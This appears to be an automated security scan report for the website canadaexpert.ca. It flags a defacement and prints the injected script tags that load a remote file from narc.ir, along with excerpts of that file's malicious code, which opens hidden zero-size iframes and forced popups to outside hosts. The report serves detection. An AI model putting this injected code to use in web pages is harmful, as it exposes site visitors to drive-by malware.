Scanned pages/files
Request | Server response | Status |
http://canadaexpert.ca/ | 200 OK Content-Length: 5577 Content-Type: text/html | suspicious |
Deface/Content modification. The following signature was found: HACKED By Soldier Afghan-361 <script src="http://narc.ir/mtp1376/secapps/a.js"></script><div id="jafar"></div> <script src="http://narc.ir/mtp1376/secapps/a.js"></script><div id="jafar"></div> <HEAD> <script language="JavaScript"> msg = new Array(); //strings written in screen msg[0] = "<h2><u><div align='center'><font color='red'> HACKED By Soldier Afghan-361 </font></div></u></h2>"; msg[1] = "<h2><u><div align='center'><font color='ffffff'> </font></div></u></h2>"; msg[2] = "<div align='center'><font color='white'>.::My love Afghanistan::.</font></div>"; msg[3] = "<div align='center'> <br>یا علی<br>Fu ...[5905 bytes skipped]... | ||
http://narc.ir/mtp1376/secapps/a.js | 200 OK Content-Length: 2261 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe width="0" height="0" src="http://narc.ir/"></iframe>'); var needpopupfck = 1; var vc_cn = "__popUp"; var link = "http://narc.ir/"; if (readCookiefck(vc_cn)&&readCookiefck(vc_cn)==2) { needpopupfck = 0; }else{ needpopupfck = 1; } var Page_Popped_fck = false; var Page_Loaded_fck = false; var Page_Enter_fck; if (needpopupfck == 1) { InitPopfck(); } function InitPopfck() { Page window.open('javascript:void(0)', '_parent','toolbar=1,location=1,directories=1,status=1,menubar=1,scrollbars=1,resizable=1'); window.focus(); if(window.open(link,'_blank','toolbar=1,scrollbars=1,location=1,statusbar=1,menubar=1,resizable=1')){ window.focus(); IncrementCountfck(); } else { window.focus(); if (Page_Loaded_fck) initAdLayer(); else XBrowserAddHandlerPops(window, "load", "initAdLayer") } } } Antivirus reports:
Hidden iFrame found. size: 0x0 src: http://rahweb.com/ <iframe width="0" height="0" src="http://rahweb.com/"> Hidden iFrame found. size: 0x0 src: http://www.secapps.org/ <iframe width="0" height="0" src="http://www.secapps.org/"> | ||
http://canadaexpert.ca/test404page.js | 404 Not Found Content-Length: 331 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: canadaexpert.ca
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sat, 05 Jul 2014 08:00:11 GMT
Server: nginx
Content-Type: text/html
X-Powered-By: PHP/5.3.28
GET / HTTP/1.1
Host: canadaexpert.ca
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sat, 05 Jul 2014 08:00:11 GMT
Server: nginx
Content-Type: text/html
X-Powered-By: PHP/5.3.28
Second query (visit from search engine):
GET / HTTP/1.1
Host: canadaexpert.ca
Referer: http://www.google.com/search?q=canadaexpert.ca
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: canadaexpert.ca
Referer: http://www.google.com/search?q=canadaexpert.ca
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=canadaexpert.ca
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://canadaexpert.ca/
Result: canadaexpert.ca is not infected or malware details are not published yet.
Result: canadaexpert.ca is not infected or malware details are not published yet.